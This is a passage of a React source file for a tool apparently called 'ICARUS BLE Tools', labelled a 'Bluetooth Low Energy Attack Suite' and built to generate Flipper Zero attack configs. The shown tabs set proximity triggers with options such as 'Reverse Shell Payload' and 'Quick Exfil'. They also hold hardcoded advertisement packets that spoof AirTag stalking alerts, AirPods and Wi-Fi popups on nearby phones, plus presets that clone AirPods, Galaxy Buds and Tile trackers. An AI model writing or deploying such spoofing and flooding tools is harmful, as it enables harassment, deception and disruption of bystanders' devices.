    ctx.beginPath()
    ctx.arc(cx, cy, 8, 0, Math.PI * 2)
    ctx.strokeStyle = 'rgba(234,179,8,0.3)'
    ctx.lineWidth = 1
    ctx.stroke()

    // Crosshairs
    ctx.beginPath()
    ctx.moveTo(cx - maxR, cy)
    ctx.lineTo(cx + maxR, cy)
    ctx.moveTo(cx, cy - maxR)
    ctx.lineTo(cx, cy + maxR)
    ctx.strokeStyle = 'rgba(234,179,8,0.06)'
    ctx.lineWidth = 1
    ctx.stroke()

    // Sweep animation glow
    const now = Date.now()
    const angle = ((now % 3000) / 3000) * Math.PI * 2
    const grad = ctx.createConicGradient(angle, cx, cy)
    grad.addColorStop(0, 'rgba(234,179,8,0.15)')
    grad.addColorStop(0.1, 'rgba(234,179,8,0)')
    grad.addColorStop(1, 'rgba(234,179,8,0)')
    ctx.beginPath()
    ctx.arc(cx, cy, maxR, 0, Math.PI * 2)
    ctx.fillStyle = grad
    ctx.fill()

  }, [rssiThreshold])

  // Animate the sweep
  useEffect(() => {
    const canvas = canvasRef.current
    if (!canvas) return
    let raf: number
    const animate = () => {
      const ctx = canvas.getContext('2d')
      if (!ctx) return

      const w = canvas.width
      const h = canvas.height
      const cx = w / 2
      const cy = h / 2
      const maxR = Math.min(cx, cy) - 10

      ctx.clearRect(0, 0, w, h)
      ctx.fillStyle = 'rgba(0,0,0,0.3)'
      ctx.fillRect(0, 0, w, h)

      const rssiLevels = [-30, -40, -50, -60, -70, -80, -90]
      for (const rssi of rssiLevels) {
        const ratio = (rssi - (-90)) / (-30 - (-90))
        const r = maxR * (1 - ratio)
        ctx.beginPath()
        ctx.arc(cx, cy, r, 0, Math.PI * 2)
        ctx.strokeStyle = 'rgba(234,179,8,0.12)'
        ctx.lineWidth = 1
        ctx.stroke()
        ctx.fillStyle = 'rgba(234,179,8,0.3)'
        ctx.font = '9px monospace'
        ctx.textAlign = 'left'
        ctx.fillText(`${rssi}`, cx + r + 3, cy - 2)
      }

      // Trigger zone fill
      const triggerRatio = (rssiThreshold - (-90)) / (-30 - (-90))
      const triggerR = maxR * (1 - triggerRatio)
      ctx.beginPath()
      ctx.arc(cx, cy, triggerR, 0, Math.PI * 2)
      ctx.fillStyle = 'rgba(234,179,8,0.06)'
      ctx.fill()
      ctx.strokeStyle = 'rgba(234,179,8,0.5)'
      ctx.lineWidth = 2
      ctx.setLineDash([4, 4])
      ctx.stroke()
      ctx.setLineDash([])

      ctx.fillStyle = 'rgba(234,179,8,0.7)'
      ctx.font = 'bold 10px monospace'
      ctx.textAlign = 'center'
      ctx.fillText('TRIGGER ZONE', cx, cy + triggerR + 14)

      // Crosshairs
      ctx.beginPath()
      ctx.moveTo(cx - maxR, cy); ctx.lineTo(cx + maxR, cy)
      ctx.moveTo(cx, cy - maxR); ctx.lineTo(cx, cy + maxR)
      ctx.strokeStyle = 'rgba(234,179,8,0.06)'; ctx.lineWidth = 1; ctx.stroke()

      // Sweep
      const now = Date.now()
      const angle = ((now % 3000) / 3000) * Math.PI * 2
      ctx.save()
      ctx.beginPath()
      ctx.moveTo(cx, cy)
      ctx.arc(cx, cy, maxR, angle, angle + 0.5)
      ctx.closePath()
      const sweepGrad = ctx.createRadialGradient(cx, cy, 0, cx, cy, maxR)
      sweepGrad.addColorStop(0, 'rgba(234,179,8,0.25)')
      sweepGrad.addColorStop(1, 'rgba(234,179,8,0)')
      ctx.fillStyle = sweepGrad
      ctx.fill()
      ctx.restore()

      // Center
      ctx.beginPath()
      ctx.arc(cx, cy, 5, 0, Math.PI * 2)
      ctx.fillStyle = 'rgba(234,179,8,0.8)'; ctx.fill()
      ctx.beginPath()
      ctx.arc(cx, cy, 8, 0, Math.PI * 2)
      ctx.strokeStyle = 'rgba(234,179,8,0.3)'; ctx.lineWidth = 1; ctx.stroke()

      raf = requestAnimationFrame(animate)
    }
    raf = requestAnimationFrame(animate)
    return () => cancelAnimationFrame(raf)
  }, [rssiThreshold])

  return <canvas ref={canvasRef} width={300} height={300} className="rounded-xl border border-gold/10 mx-auto block" />
}

function ProximityTriggerTab() {
  const [targetMAC, setTargetMAC] = useState('')
  const [targetName, setTargetName] = useState('')
  const [rssiThreshold, setRssiThreshold] = useState(-60)
  const [triggerAction, setTriggerAction] = useState('ble_spam')
  const [cooldown, setCooldown] = useState(5)
  const [oneShot, setOneShot] = useState(false)

  const config = [
    `Filetype: Flipper BLE Proximity Trigger`,
    `Version: 1`,
    `# Generated by ICARUS BLE Tools`,
    `Target_MAC: ${targetMAC || 'any'}`,
    `Target_Name_Filter: ${targetName || '*'}`,
    `RSSI_Threshold: ${rssiThreshold}`,
    `Trigger_Action: ${triggerAction}`,
    `Cooldown_Minutes: ${cooldown}`,
    `Mode: ${oneShot ? 'one-shot' : 'repeating'}`,
  ].join('\n')

  return (
    <div className="space-y-5">
      {/* Radar */}
      <motion.div className={glassPanel + ' p-4'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.05 }}>
        <div className={labelClass + ' mb-3 text-center'}>Proximity Radar</div>
        <ProximityRadar rssiThreshold={rssiThreshold} />
      </motion.div>

      {/* Config */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.1 }}>
        <div className={labelClass}>Target Configuration</div>
        <div>
          <div className={labelClass}>Target MAC Address</div>
          <input value={targetMAC} onChange={e => setTargetMAC(e.target.value)} className={inputClass} placeholder='AA:BB:CC:DD:EE:FF or leave empty for "any new device"' />
        </div>
        <div>
          <div className={labelClass}>Device Name Filter (partial match)</div>
          <input value={targetName} onChange={e => setTargetName(e.target.value)} className={inputClass} placeholder="e.g. AirPods, Galaxy, etc." />
        </div>
        <GoldSlider value={rssiThreshold} min={-90} max={-30} onChange={setRssiThreshold} label="RSSI Threshold" unit=" dBm" />
        <div>
          <div className={labelClass}>Trigger Action</div>
          <select value={triggerAction} onChange={e => setTriggerAction(e.target.value)} className={selectClass + ' w-full'}>
            <option value="ble_spam">BLE Spam Burst</option>
            <option value="rickroll">BadUSB Rickroll</option>
            <option value="reverse_shell">Reverse Shell Payload</option>
            <option value="exfil">Quick Exfil</option>
            <option value="notification_flood">Notification Flood</option>
            <option value="custom_script">Custom Script</option>
          </select>
        </div>
        <GoldSlider value={cooldown} min={1} max={60} onChange={setCooldown} label="Cooldown" unit=" min" />
        <GoldToggle value={oneShot} onChange={setOneShot} label="One-Shot Mode" />
      </motion.div>

      {/* Output */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.15 }}>
        <div className={labelClass}>Generated Config</div>
        <pre className={hexDisplayClass + ' whitespace-pre-wrap text-[11px]'}>{config}</pre>
        <div className="flex gap-2 pt-1">
          <SaveButton content={config} filename="proximity_trigger.txt" />
          <DeployButton config={config} name="proximity_trigger" />
        </div>
      </motion.div>
    </div>
  )
}

// ─── Tab: Social Engineer ─────────────────────────────────────────────────────

const NOTIFICATION_TYPES: {
  id: string; label: string; platform: string; advData: string; description: string
}[] = [
  { id: 'airtag-stalking', label: 'AirTag Found Moving With You', platform: 'Apple', advData: '1EFF4C001219004D000000000000000000000000000000000000000000000000', description: 'Triggers fake AirTag stalking alert' },
  { id: 'airpods-nearby', label: 'AirPods Nearby', platform: 'Apple', advData: '0719010E2000000000000000000000000000000000000000', description: 'Fake AirPods pairing popup' },
  { id: 'share-wifi', label: 'Share WiFi Password?', platform: 'Apple', advData: '0C0E080000000000000000000000', description: 'Fake WiFi sharing prompt' },
  { id: 'fast-pair-found', label: 'Device Found Nearby', platform: 'Android', advData: '0201060BFFFE0006D4F4FA00000000', description: 'Fast Pair device discovery notification' },
  { id: 'fast-pair-setup', label: 'Set Up New Device', platform: 'Android', advData: '0201060BFFFE0006718FA400000000', description: 'New device setup notification' },
  { id: 'swift-pair', label: 'New Bluetooth Device', platform: 'Windows', advData: '0201060AFF0600030080', description: 'Swift Pair new device notification' },
]

function SocialEngineerTab() {
  const [selectedNotif, setSelectedNotif] = useState(NOTIFICATION_TYPES[0].id)
  const [targetCount, setTargetCount] = useState(10)
  const [notifInterval, setNotifInterval] = useState(100)
  const [customName, setCustomName] = useState('')
  const [rotation, setRotation] = useState<'sequential' | 'random' | 'burst'>('sequential')

  const notif = NOTIFICATION_TYPES.find(n => n.id === selectedNotif)!

  const config = [
    `Filetype: Flipper BLE Social Engineer`,
    `Version: 1`,
    `# Generated by ICARUS BLE Tools`,
    `Attack_Type: ${notif.id}`,
    `Platform: ${notif.platform}`,
    `Device_Name: ${customName || notif.label}`,
    `Target_Count: ${targetCount}`,
    `Interval: ${notifInterval}`,
    `Rotation: ${rotation}`,
    `MAC: ${randomMAC()}`,
    `Adv_Data: ${notif.advData}`,
  ].join('\n')

  return (
    <div className="space-y-5">
      {/* Notification Types */}
      <motion.div className={glassPanel + ' p-4'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.05 }}>
        <div className={labelClass + ' mb-3'}>Notification Type</div>
        <div className="space-y-2">
          {NOTIFICATION_TYPES.map(n => (
            <button
              key={n.id}
              onClick={() => setSelectedNotif(n.id)}
              className={`${glassPanelHover} w-full p-3 text-left ${selectedNotif === n.id ? 'border-gold/40 bg-gold/[0.06]' : ''}`}
            >
              <div className="flex items-center justify-between">
                <div>
                  <span className="text-xs font-display tracking-wider text-gold/80">{n.label}</span>
                  <div className="text-[9px] text-text-tertiary mt-0.5">{n.description}</div>
                </div>
                <span className={`text-[9px] px-2 py-0.5 rounded-full font-mono ${
                  n.platform === 'Apple' ? 'bg-white/5 text-white/60' :
                  n.platform === 'Android' ? 'bg-green-500/10 text-green-400/60' :
                  'bg-blue-500/10 text-blue-400/60'
                }`}>{n.platform}</span>
              </div>
            </button>
          ))}
        </div>
      </motion.div>

      {/* Settings */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.1 }}>
        <div className={labelClass}>Configuration</div>
        <div>
          <div className={labelClass}>Custom Device Name</div>
          <input value={customName} onChange={e => setCustomName(e.target.value)} className={inputClass} placeholder={notif.label} />
        </div>
        <GoldSlider value={targetCount} min={1} max={100} onChange={setTargetCount} label="Notification Count" />
        <GoldSlider value={notifInterval} min={10} max={2000} step={10} onChange={setNotifInterval} label="Interval Between Notifications" unit="ms" />
        <div>
          <div className={labelClass + ' mb-1.5'}>Rotation Pattern</div>
          <div className="flex gap-2">
            {(['sequential', 'random', 'burst'] as const).map(r => (
              <button
                key={r}
                onClick={() => setRotation(r)}
                className={`flex-1 py-2 rounded-lg text-[10px] font-display tracking-wider border transition-all ${
                  rotation === r ? 'bg-gold/15 text-gold border-gold/40' : 'bg-white/[0.02] text-text-tertiary border-white/5 hover:text-gold/60'
                }`}
              >
                {r.toUpperCase()}
              </button>
            ))}
          </div>
        </div>
      </motion.div>

      {/* Output */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.15 }}>
        <div className={labelClass}>Advertisement Packet</div>
        <div className={hexDisplayClass}>{notif.advData}</div>
        <div className={labelClass + ' mt-3'}>Generated Config</div>
        <pre className={hexDisplayClass + ' whitespace-pre-wrap text-[11px]'}>{config}</pre>
        <div className="flex gap-2 pt-1">
          <CopyHexButton text={notif.advData} />
          <SaveButton content={config} filename={`social_${notif.id}.txt`} />
          <DeployButton config={config} name={`social_${notif.id}`} />
        </div>
      </motion.div>
    </div>
  )
}

// ─── Tab: Device Impersonator ─────────────────────────────────────────────────

const IMPERSONATOR_PRESETS: {
  id: string; label: string; name: string; mac: string; serviceUUIDs: string; mfgData: string; txPower: number
}[] = [
  { id: 'airpods', label: 'Clone AirPods', name: 'AirPods Pro', mac: '', serviceUUIDs: 'FEC9, FE2C', mfgData: '4C000719010E2000000000000000000000000000000000000000', txPower: -45 },
  { id: 'galaxy-buds', label: 'Clone Galaxy Buds', name: 'Galaxy Buds2 Pro', mac: '', serviceUUIDs: 'FD5A', mfgData: '750100A7C62B000000000000', txPower: -50 },
  { id: 'tile', label: 'Clone Tile Tracker', name: 'Tile Mate', mac: '', serviceUUIDs: 'FEED, FEBE', mfgData: '0D0001000000000000000000', txPower: -55 },
  { id: 'custom', label: 'Custom', name: '', mac: '', serviceUUIDs: '', mfgData: '', txPower: -50 },
]

function DeviceImpersonatorTab() {
  const [selectedPreset, setSelectedPreset] = useState('airpods')
  const [deviceName, setDeviceName] = useState(IMPERSONATOR_PRESETS[0].name)
  const [mac, setMac] = useState('')
  const [serviceUUIDs, setServiceUUIDs] = useState(IMPERSONATOR_PRESETS[0].serviceUUIDs)
  const [mfgData, setMfgData] = useState(IMPERSONATOR_PRESETS[0].mfgData)
  const [txPower, setTxPower] = useState(IMPERSONATOR_PRESETS[0].txPower)

  const selectPreset = (id: string) => {
    const p = IMPERSONATOR_PRESETS.find(x => x.id === id)
    if (p) {
      setSelectedPreset(id)
      if (p.name) setDeviceName(p.name)
      setServiceUUIDs(p.serviceUUIDs)
      setMfgData(p.mfgData)
      setTxPower(p.txPower)
    }
  }

  const advHex = mfgData || '00'
  const config = [
    `Filetype: Flipper BLE Device Clone`,
    `Version: 1`,
    `# Generated by ICARUS BLE Tools`,
    `Device_Name: ${deviceName}`,
    `MAC: ${mac || randomMAC()}`,
    `Service_UUIDs: ${serviceUUIDs}`,
    `Manufacturer_Data: ${mfgData}`,
    `TX_Power: ${txPower}`,
    `Adv_Data: ${advHex}`,
  ].join('\n')

  return (
    <div className="space-y-5">
      {/* Presets */}
      <motion.div className={glassPanel + ' p-4'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.05 }}>
        <div className={labelClass + ' mb-3'}>Clone Presets</div>
        <div className="grid grid-cols-2 gap-2">
          {IMPERSONATOR_PRESETS.map(p => (
            <button
              key={p.id}
              onClick={() => selectPreset(p.id)}
              className={`${glassPanelHover} p-3 text-left ${selectedPreset === p.id ? 'border-gold/40 bg-gold/[0.06]' : ''}`}
            >
              <div className="text-xs font-display tracking-wider text-gold/80">{p.label}</div>
              {p.name && <div className="text-[9px] text-text-tertiary font-mono mt-0.5">{p.name}</div>}
            </button>
          ))}
        </div>
      </motion.div>

      {/* Fields */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.1 }}>
        <div className={labelClass}>Device Identity</div>
        <div>
          <div className={labelClass}>Device Name</div>
          <input value={deviceName} onChange={e => setDeviceName(e.target.value)} className={inputClass} placeholder="Device name to impersonate" />
        </div>
        <div>
          <div className={labelClass}>MAC Address</div>
          <input value={mac} onChange={e => setMac(e.target.value)} className={inputClass} placeholder="AA:BB:CC:DD:EE:FF (or leave blank for random)" />
        </div>
        <div>
          <div className={labelClass}>Service UUIDs</div>
          <input value={serviceUUIDs} onChange={e => setServiceUUIDs(e.target.value)} className={inputClass} placeholder="FEC9, FE2C" />
        </div>
        <div>
          <div className={labelClass}>Manufacturer Data (hex)</div>
          <textarea
            value={mfgData}
            onChange={e => setMfgData(e.target.value)}
            className={inputClass + ' h-20 resize-none'}
            placeholder="Raw manufacturer data in hex..."
          />
        </div>
        <GoldSlider value={txPower} min={-100} max={0} onChange={setTxPower} label="TX Power Level" unit=" dBm" />
      </motion.div>

      {/* Output */}
      <motion.div className={glassPanel + ' p-4 space-y-3'} initial={{ opacity: 0, y: 10 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.15 }}>
        <div className={labelClass}>Raw Advertisement Packet</div>
        <div className={hexDisplayClass}>{advHex}</div>
        <div className={labelClass + ' mt-3'}>Flipper Config</div>
        <pre className={hexDisplayClass + ' whitespace-pre-wrap text-[11px]'}>{config}</pre>
        <div className="flex gap-2 pt-1">
          <CopyHexButton text={advHex} />
          <SaveButton content={config} filename={`clone_${selectedPreset}.txt`} />
          <DeployButton config={config} name={`clone_${selectedPreset}`} />
        </div>
      </motion.div>
    </div>
  )
}

// ─── Main Tabs Component ──────────────────────────────────────────────────────

const TABS: { id: string; label: string; icon: typeof Radio }[] = [
  { id: 'spam', label: 'SPAM SUITE', icon: Zap },
  { id: 'beacon', label: 'BEACON FORGE', icon: Radio },
  { id: 'honeypot', label: 'HONEYPOT', icon: Shield },
  { id: 'proximity', label: 'PROXIMITY', icon: Target },
  { id: 'social', label: 'SOCIAL ENG', icon: Users },
  { id: 'impersonator', label: 'IMPERSONATOR', icon: Cpu },
]

export default function BleToolsView() {
  const [activeTab, setActiveTab] = useState('spam')

  return (
    <div className="w-full h-full flex flex-col overflow-hidden">
      {/* Header */}
      <motion.div
        className="shrink-0 px-6 pt-5 pb-0"
        initial={{ opacity: 0, y: -10 }}
        animate={{ opacity: 1, y: 0 }}
        transition={{ duration: 0.3 }}
      >
        <div className="flex items-center gap-3 mb-4">
          <div className="w-10 h-10 rounded-xl bg-gold/10 border border-gold/20 flex items-center justify-center shadow-[0_0_20px_rgba(234,179,8,0.1)]">
            <Radio className="w-5 h-5 text-gold" />
          </div>
          <div>
            <h1 className="text-lg font-display tracking-widest text-gold" style={{ textShadow: '0 0 20px rgba(234,179,8,0.3)' }}>
              BLE TOOLS
            </h1>
            <p className="text-[10px] text-text-tertiary font-mono tracking-wider">Bluetooth Low Energy Attack Suite</p>
          </div>
        </div>

        {/* Tab Bar */}
        <div className="flex gap-1 border-b border-gold/10 pb-0">
          {TABS.map((tab, i) => {
            const isActive = activeTab === tab.id
            return (
              <motion.button
                key={tab.id}
                onClick={() => setActiveTab(tab.id)}
                className={`relative px-3 py-2.5 text-[10px] font-display tracking-wider transition-all duration-200 flex items-center gap-1.5 ${
                  isActive
                    ? 'text-gold'
                    : 'text-text-tertiary hover:text-gold/60'
                }`}
                initial={{ opacity: 0, y: -5 }}
                animate={{ opacity: 1, y: 0 }}
                transition={{ delay: i * 0.04 }}
              >
                <tab.icon className="w-3 h-3" />
                {tab.label}
                {isActive && (
                  <motion.div
                    layoutId="ble-tab-indicator"
                    className="absolute bottom-0 left-0 right-0 h-[2px] bg-gold rounded-t"
                    style={{ boxShadow: '0 0 8px rgba(234,179,8,0.5)' }}
                  />
                )}
              </motion.button>
            )
          })}
        </div>
      </motion.div>

      {/* Tab Content */}
      <div className="flex-1 overflow-y-auto px-6 py-5 scrollbar-thin scrollbar-thumb-gold/10 scrollbar-track-transparent">
        <AnimatePresence mode="wait">
          <motion.div
            key={activeTab}
            initial={{ opacity: 0, x: 10 }}
            animate={{ opacity: 1, x: 0 }}
            exit={{ opacity: 0, x: -10 }}
            transition={{ duration: 0.15 }}
          >
            {activeTab === 'spam' && <SpamSuiteTab />}
            {activeTab === 'beacon' && <BeaconForgeTab />}
            {activeTab === 'honeypot' && <HoneypotTab />}
            {activeTab === 'proximity' && <ProximityTriggerTab />}
            {activeTab === 'social' && <SocialEngineerTab />}
            {activeTab === 'impersonator' && <DeviceImpersonatorTab />}
          </motion.div>
        </AnimatePresence>
      </div>
    </div>
  )
}
